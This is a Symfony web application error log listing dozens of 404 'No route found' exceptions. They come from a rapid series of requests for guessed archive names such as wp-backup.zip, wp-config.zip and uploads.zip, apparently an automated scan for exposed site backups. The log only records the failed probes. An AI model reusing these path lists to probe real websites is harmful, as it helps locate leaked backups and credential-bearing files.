[2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-complete.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-complete.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-complete.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-complete.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /website.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /website.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /portal.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /portal.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /htdocs.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /htdocs.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-files.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-files.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-site.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-site.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-full.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-full.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /domain.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /domain.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-admin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-admin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-files.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-files.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-config.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-config.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /uploads.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /uploads.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-config.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-config.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /upload.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /upload.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /media.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /media.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /images.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /images.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /documents.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /documents.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /gallery.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /gallery.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /content.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /content.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /files.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /files.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /attachments.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /attachments.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /photos.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /photos.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /audio.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /audio.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /apis.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /apis.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /downloads.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /downloads.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webservices.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webservices.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webservice.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webservice.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /services.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /services.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /videos.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /videos.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /resources.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /resources.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /apps.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /apps.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /application.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /application.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /microservices.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /microservices.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /applications.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /applications.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /static.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /static.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /microservice.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /microservice.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
